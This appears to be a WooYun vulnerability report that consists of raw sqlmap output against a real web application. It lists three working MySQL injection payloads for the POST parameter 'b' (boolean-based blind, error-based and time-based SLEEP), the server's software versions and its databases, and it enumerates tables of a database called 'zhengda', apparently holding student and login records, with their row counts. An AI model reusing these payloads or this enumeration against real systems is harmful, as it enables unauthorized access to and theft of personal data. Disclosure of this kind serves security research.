WooYun.org

sqlmap identified the following injection points with a total of 429 HTTP(s) requests:
---
Parameter: b (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: b=admin' RLIKE (SELECT (CASE WHEN (2958=2958) THEN 0x61646d696e ELSE 0x28 END)) AND 'OjvK'='OjvK&c=admin&d=gjqt
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: b=admin' AND (SELECT 1595 FROM(SELECT COUNT(*),CONCAT(0x717a716b71,(SELECT (ELT(1595=1595,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pKBv'='pKBv&c=admin&d=gjqt
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: b=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))nEDw) AND 'vGoM'='vGoM&c=admin&d=gjqt
---
web server operating system: Windows
web application technology: PHP 5.2.5, Apache 2.2.6
back-end DBMS: MySQL 5.0
available databases [7]:
[*] eeee
[*] information_schema
[*] mycounter
[*] mysql
[*] phpmyadmin
[*] test
[*] zhengda

Database: zhengda
[43 tables]
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| xuesheng              | 57143   |
| denglu                | 57041   |
| qiye                  | 49473   |
| guanli_log            | 39594   |
| da_log                | 32660   |
| lishi_aaa             | 18562   |
| login_logout          | 15599   |
| renshidaili           | 7771    |
| `20140731ren`         | 6624    |
| tmp_users             | 3890    |
| xl_tongji             | 3890    |
| diqu1                 | 3523    |
| diqu_ban              | 3523    |
| diqu_1                | 3419    |
| diqu                  | 2412    |
| diqu_new_20140912     | 2411    |